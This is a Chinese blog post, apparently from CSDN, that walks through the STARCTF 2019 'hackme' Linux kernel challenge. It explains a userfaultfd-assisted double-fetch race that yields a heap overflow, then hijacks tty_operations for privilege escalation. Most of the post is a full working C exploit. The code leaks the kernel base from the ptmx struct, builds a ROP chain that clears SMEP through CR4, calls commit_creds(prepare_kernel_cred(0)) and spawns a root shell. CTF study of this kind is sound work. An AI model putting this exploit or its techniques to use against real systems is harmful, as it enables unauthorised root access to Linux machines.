linux kernal pwn STARCTF 2019 hackme(四)官方正解利用userfaultfd机制double fetch

最新推荐文章于 2023-10-27 21:51:45 发布
最新推荐文章于 2023-10-27 21:51:45 发布
阅读量290 收藏 1
点赞数
分类专栏: CTF 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/123952461
版权
本文介绍了一种利用userfaultfd机制的doublefetch漏洞,通过未对poll操作加锁导致的数据竞争,实现了内存溢出并劫持tty结构,最终实现ret2usr攻击。教程详细到实战代码,包括内存管理、权限提升步骤和exploit实现。
摘要由CSDN通过智能技术生成

又是承接上文

我们上次介绍了userfaultfd机制,并且完成了一次利用
利用的方法是先用userfaultfd机制处理页错误让程序卡主,然后任意读写修改cred结构体完成提权。

这次是官方exp的正解,还是利用userfaultfd机制,做了一个double fetch。

问题出在没有对poll上锁
导致不同的线程可以对同一个object进行访问。
结合我们看到
在这里插入图片描述
free的时候没有清空size

在这里插入图片描述malloc的时候是先申请,再写,再给size赋值。
那么加入我们存在这样一个情形。

线程一正常释放了一个object 0x10000,然后申请了一个0x200的object,此时,size没变。然后copy_from_user的时候用userfaultfd机制,给他卡住。那么此时,这个object就是虽然是0x200,但是可以读写0x10000,造成溢出。

溢出的操作用另一个线程即可。

能溢出之后利用的方法也是通过溢出,劫持tty结构体的operation结构体。
最后转成ret2usr即可。

exp其实如果前面都看下来的话感觉还是很好写的。
就把前面学过的都拼一拼就好了。

下面是大佬exp 自取。
但是其实我瞅了瞅大佬exp似乎写的有些繁琐。
在泄露地址,劫持tty_operation的ioctl函数的时候完全可以用前面的
但是我也懒得改了
就酱。

#include <stdio.h>
#include <pthread.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <string.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <errno.h>
#include <signal.h>
#include <sys/syscall.h>
#include <stdint.h>
#include <sys/prctl.h>
#include <linux/userfaultfd.h>
#include <poll.h>
#include <assert.h>

#define ALLOC 0x30000
#define DEL 0x30001
#define READ 0x30003
#define WRITE 0x30002

struct arg
{
    size_t idx;
    void *addr;
    long long len;
    long long offset;
};

void alloc(int fd,int idx,char *user,long long len){
    struct arg cmd;
    cmd.idx = idx;
    cmd.len = len;
    cmd.addr = user;
    ioctl(fd,ALLOC,&cmd);
}

void delete(int fd,int idx){
    struct arg cmd;
    cmd.idx = idx;
    ioctl(fd,DEL,&cmd);
}

void read_from_kernel(int fd,int idx,char *user,long long len,long long offset){
    struct arg cmd;
    cmd.idx = idx;
    cmd.len = len;
    cmd.addr = user;
    cmd.offset = offset;
    ioctl(fd,READ,&cmd);    
}
void write_to_kernel(int fd,int idx,char *user,long long len,long long offset){
    struct arg cmd;
    cmd.idx = idx;
    cmd.len = len;
    cmd.addr = user;
    cmd.offset = offset;
    ioctl(fd,WRITE,&cmd);   
}

void print_hex( char *buf,int size){
    int i;
    puts("======================================");
    printf("data :\n");
    for (i=0 ; i<(size/8);i++){
        if (i%2 == 0){
            printf("%d",i/2);
        }
        printf(" %16llx",*(size_t * )(buf + i*8));
        if (i%2 == 1){
            printf("\n");
        }       
    }
    puts("======================================");
}

size_t user_cs, user_ss,user_rflags, user_sp ,user_gs,user_es,user_fs,user_ds;
void save_status(){
    __asm__("mov %%cs, %0\n"
            "mov %%ss,%1\n"
            "mov %%rsp,%2\n"
            "pushfq\n"
            "pop %3\n"
            "mov %%gs,%4\n"
            "mov %%es,%5\n"
            "mov %%fs,%6\n"
            "mov %%ds,%7\n"
            ::"m"(user_cs),"m"(user_ss),"m"(user_sp),"m"(user_rflags),
            "m"(user_gs),"m"(user_es),"m"(user_fs),"m"(user_ds)
            );
    puts("[*]status has been saved.");
}
void sh(){
    system("sh");
    exit(0);
}
int (*commit_creds)(unsigned long cred);
unsigned long (*prepare_kernel_cred)(unsigned long cred);

void sudo(){
    commit_creds(prepare_kernel_cred(0));
    asm(
    "push %0\n"
    "push %1\n"
    "push %2\n"
    "push %3\n"
    "push %4\n"
    "push $0\n"       //rbp
    "swapgs\n"
    "pop %%rbp\n"     //rbp
    "iretq\n"
    ::"m"(user_ss),"m"(user_sp),"m"(user_rflags),"m"(user_cs),"a"(&sh)
    );
}
void errExit(char* msg)
{
  puts(msg);
  exit(-1);
}

void* handler(void *arg)
{
  struct uffd_msg msg;
  unsigned long uffd = (unsigned long)arg;
  puts("[+] handler created");

  struct pollfd pollfd;
  int nready;
  pollfd.fd      = uffd;
  pollfd.events  = POLLIN;
  nready = poll(&pollfd, 1, -1);
  if (nready != 1)  //
    errExit("[-] Wrong pool return value");
  printf("[+] Trigger! I'm going to hang\n");

  if (read(uffd, &msg, sizeof(msg)) != sizeof(msg)) 
    errExit("[-] Error in reading uffd_msg");
  assert(msg.event == UFFD_EVENT_PAGEFAULT);
  printf("[+] fault page handler finished");
  sleep(1000);
  return 0;
}

void register_userfault(uint64_t fault_page, uint64_t fault_page_len)
{
  struct uffdio_api ua;
  struct uffdio_register ur;
  pthread_t thr;

  uint64_t uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
  ua.api = UFFD_API;
  ua.features = 0;
  if (ioctl(uffd, UFFDIO_API, &ua) == -1)
    errExit("[-] ioctl-UFFDIO_API");
  ur.range.start = (unsigned long)fault_page;
  ur.range.len   = fault_page_len;
  ur.mode        = UFFDIO_REGISTER_MODE_MISSING;
  if (ioctl(uffd, UFFDIO_REGISTER, &ur) == -1)
    errExit("[-] ioctl-UFFDIO_REGISTER"); 
  int s = pthread_create(&thr, NULL, handler, (void*)uffd);
  if (s!=0)
    errExit("[-] pthread_create");
    return;
}

#define SEARCH_SIZE 0x200000
int main(){
    save_status();
    int fd = open("/dev/hackme", 0);
    char *mem = malloc(SEARCH_SIZE);
    memset(mem,0,SEARCH_SIZE);
    uint64_t kernel_base, heap_base, ptm_unix98_ops = 0xffffffffb7825d80 - 0xffffffffb7200000; // 0x625D80
    if (fd < 0){
        printf("[-] bad open /dev/hackme\n");
        exit(-1);
    }
    alloc(fd, 0, mem, SEARCH_SIZE);
    delete(fd, 0);
    if (fork() == 0)
    {
        mem = (char*)mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
        uint64_t fault_page = (uint64_t)mem;
        uint64_t fault_page_len = 0x1000;
        register_userfault(fault_page, fault_page_len);
        alloc(fd, 0, mem, 0x2e0);
    }
    sleep(2); 
    int ptmx_fd = open("/dev/ptmx",0);
    if (ptmx_fd < 0)
        errExit("[-] bad open /dev/ptmx");
    printf("---- begin to find ptmx struct\n");
    uint64_t evil_buf[0x200/8];
    uint64_t ptmx_offset=0;
    int j = 0;

    for (int i=0; i<SEARCH_SIZE; i+=0x200)
    {
        read_from_kernel(fd, 0, (char*)evil_buf, 0x200, i);
        for (j = 0; j < 0x200/8; j++)     // 其实一般是对齐的,所以一般 j==0
            if (evil_buf[j] == 0x0000000100005401)
            {
                ptmx_offset = i+j*8;
                printf("[+] find ptmx struct at offset: 0x%lx\n", ptmx_offset);
                break;
            }
        if (ptmx_offset != 0)
            break;
    }
    if (ptmx_offset == 0)
        errExit("[-] Cannot find ptmx struct");
    // print_hex(evil_buf+j*8, 0x200 - j*8);
    kernel_base = evil_buf[3] - ptm_unix98_ops;
    heap_base   = evil_buf[7] - 0x38 - ptmx_offset;
    printf("[+] kernel_base = 0x%lx\n", kernel_base);
    printf("[+] heap_base   = 0x%lx\n", heap_base);
    prepare_kernel_cred = 0x4d3d0 + kernel_base;
    commit_creds        = 0x4d220 + kernel_base;
    
    evil_buf[3] = (uint64_t)heap_base + 0x180;     
    evil_buf[0x38/8] = heap_base + 0x100;          
    write_to_kernel(fd, 0, evil_buf, sizeof(evil_buf), ptmx_offset);

    uint64_t fake_tty_operations[40];
    for (int i = 0; i < 0x10; i++)   //一般
        fake_tty_operations[0x80/8+i] = kernel_base + 0x5dbef; 
    fake_tty_operations[0xc8/8] = kernel_base + 0x200f66; //mov  rsp, rax;  pop  r12;  push r12; retn
    fake_tty_operations[0]  = kernel_base + 0x01b5a1; //pop rax ; ret
    fake_tty_operations[1]  = 0x6f0;
    fake_tty_operations[2]  = kernel_base + 0x0252b; //mov cr4, rax; push rcx; popfq; pop rbp; ret;
    fake_tty_operations[3]  = 0xdeadbeef;
    fake_tty_operations[4]  = &sudo;
    write_to_kernel(fd, 0, fake_tty_operations, sizeof(fake_tty_operations), 0x100);
    ioctl(ptmx_fd,0xdeadbeef,0xdeadbabe);   
}
yongbaoii
关注
专栏目录
Linux kernal 核心中文手册》.rar_kernal_linux 手册_linux kernal_linux 手册
09-23
Linux Kernel 核心中文手册》是一份专为中文用户设计的详尽指南,旨在帮助读者深入了解Linux操作系统的核心机制和工作原理。这份手册是Linux爱好者、系统管理员、开发者以及任何对Linux内核感兴趣的人的重要参考...
Linux内核机制总结内存管理之用户页错误文件描述符(二十八)
m0_67392010的博客
03-15 867
文章目录 1 用户页错误文件描述符 1.1 使用方法 1.2 技术原理 重要:本系列文章内容摘自<Linux内核深度解析>基于ARM64架构的Linux4.x内核一书,作者余华兵。系列文章主要用于记录Linux内核的大部分机制及参数的总结说明 1 用户页错误文件描述符 userfaultfd(用户页错误文件描述符)用来拦截和处理用户空间的页错误异常,内核通过文件描述符将页错误异常的信息传递给用户空间,然后由用户空间决定要往虚拟页写入的数据。传统的页错误异常由内核独自处理,
内核入口地址在哪修改_【linux内核userfaultfd使用】Balsn CTF 2019 KrazyNote(一)
weixin_39955355的博客
11-24 459
userfaltfd在内核漏洞利用中非常有用,借这道题来学习一下。一、背景知识1.提权内核提权一般需要利用漏洞来修改task_struct中的cred结构,commit_cred(prepare_kernel_creds(0))会帮你找到cred结构并修改。SMEP防止在内核态执行用户态代码,采用ROP来绕过;SMAP防止内核态使用用户态数据,切断了用户态的...
Userfaultfd
最新发布
yiyeguzhou100的专栏
10-27 549
Userfaults allow the implementation of on-demand paging from userland and more generally they allow userland to take control of various memory page faults, something otherwise only the kernel code could do.For example userfaults allows a proper and more op
LWN:阻止userfaultfd()处理kernel-fault!
Linux News搬运工
05-22 1050
关注了就能看到更多这么棒的文章哦~Blocking userfaultfd() kernel-fault handlingByJonathan CorbetMay 8, 2020原文来...
Kernel pwn 入门 (7)
CoLin的pwn小屋
10-08 702
Kernel pwn 入门(7)
Linux kernal 核心中文手册.rar_kernal_linux_linux 内核_linux 核心_linux2.6
09-19
在"Linux kernal 核心中文手册.rar"这个压缩包中,包含了对Linux内核的详细解读,主要针对中文用户,帮助他们更好地理解和操作Linux系统。其中包含的文件有"Linux kernal 核心中文手册.chm",这是一部完整的中文手册...
Linux Kernal 核心中文手册
02-18
这份"Linux Kernal核心中文手册"是理解Linux内核工作原理的重要参考资料,尤其对于那些希望深入学习Linux系统的人来说,它是不可或缺的工具。 手册首先可能会介绍Linux内核的基本架构,包括内核启动过程,进程管理...
Linux kernal 核心中文手册
07-17
本手册《Linux kernal 核心中文手册》是深入理解Linux内核的重要参考资料,尤其对于Linux开发者和系统管理员来说,它提供了丰富的理论知识和实践指导。 1. **进程管理**:内核通过调度算法控制进程的执行,包括进程...
linux kernal 代码
10-21
linux kernal 的源码 方便想学习linux的同学下载使用
umcache:使用userfaultfd的用户模式缓存
02-15
使用userfaultfd的用户模式缓存 描述 使用userfaultfd在前端内存区域和后端内存区域之间进行简单的直接映射缓存实现。 执照 Boost软件许可1.0
linux kernel pwn学习之条件竞争(二)userfaultfd
seaaseesa的博客
03-04 3493
userfaultfd、mobprobe_path、mod_tree的利用 userfaultfdlinux下的一直缺页处理机制,用户可以自定义函数来处理这种事件。所谓的缺页,就是所访问的页面还没有装入RAM中。比如mmap创建的堆,它实际上还没有装载到内存中,系统有自己默认的机制来处理,用户也可以自定义处理函数,在处理函数没有结束之前,缺页发生的位置将处于暂停状态。这将非常有助于条件竞争的利...
starctf 2019 hackme
weixin_46483787的博客
04-19 2592
学kernel的第天 解包之后发现init是空的,好怪哦 接下来分析ko文件,可以看到只实现了一个ioctl比较有用 首先是与用户态交互,交互方式是每次32字节,可以看做一个结构体 struct io { dword idx dword padding qword buf qword len qword offset } 然后实现了增删读写个功能 在读写的时候进行了怎样的操作我们来观察一下: 首先会根据传入的结构体中的idx来确定对哪个chunk进行操作,然后根据offset来确定要读写
linux kernal pwn STARCTF 2019 hackme(一) 劫持modprobe_path
yongbaoii的博客
04-20 533
从用户态传入了0x20的数据,其数据放在了pool里面 在IDA里面看的话就是 就是他传入的个QWORD 。 我们可以看得出来30001的时候就是通过v17来找到相关地址,然后kfree,再清零 所以其实就看得出来v17是index。 功能30002 v8是slab的地址 v20是从哪开始写 v9[1]里面就是size 所以就是往里面写 功能30003 上面是写进去 所以这个自然就是读出来 功能30000 读入一段 根据这一段申请slab 漏洞有两个 首先我们显而易见的在读写slab的时候对of.
LWN: /dev/userfaultfd
Linux News搬运工
06-27 370
关注了就能看到更多这么棒的文章哦~/dev/userfaultfdBy Jonathan CorbetJune 13, 2022DeepL assisted translationhttps://lwn.net/Articles/897260/userfaultfd() 系统调用允许一个线程在用户空间帮另一个线程来处理 page fault。有许多有趣的实用例子,比如虚拟...
linux kernal pwn STARCTF 2019 hackme(三)userfaultfd机制修改cred
yongbaoii的博客
04-20 440
首先再熟悉一下userfaultfd机制
starctf_2019_upxofcpp
seaaseesa的博客
04-30 538
starctf_2019_upxofcpp 程序用了UPX壳保护,通过upx –d脱壳后,拿到IDA里分析。 Delete以后没有清空指针,存在UAF,但是无法double free,因为程序中使用虚表调用,delete一次后,虚表对应位置已经被清空。因此第二次delete同一个chunk将进入else语句,进而崩溃。由于函数指针放在chunk里,因此,我们可以伪虚表指针,再利用UAF来执...
userfaultfd(2) — Linux manual page
RToax
06-18 398
USERFAULTFD(2) Linux Programmer's Manual USERFAULTFD(2) NAME top userfaultfd - create a file descriptor for handling page faults in user space SYNOPSIS top #include <sys/types.h> ...
Linux 4.3 亮点特性
cui841923894的博客
08-15 465
源于https://kernelnewbies.org/Linux_4.3 1.删除Ext3文件系统 Ext3文件系统已经从liux核心代码删除。原因是Ext4支持已经可以替代Ext3,所以maintainers认为Ext3代码已经无用可以删除。 2.userfaultfd()用于处理用户空间缺页错误的系统调用 当进程map系统调用但是虚拟地址对应的物理地址未被分配是,内核会发生缺页中断处...
Linux内核研究巅峰之作:主奴机制解析
"Linux内核设计的艺术是一本深入探讨Linux内核的书籍,它代表了全球顶级的Linux内核研究水平,首次提出了操作系统设计的核心概念——主奴机制。这本书旨在揭示Linux内核的工作原理和设计哲学,帮助读者理解如何构建...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值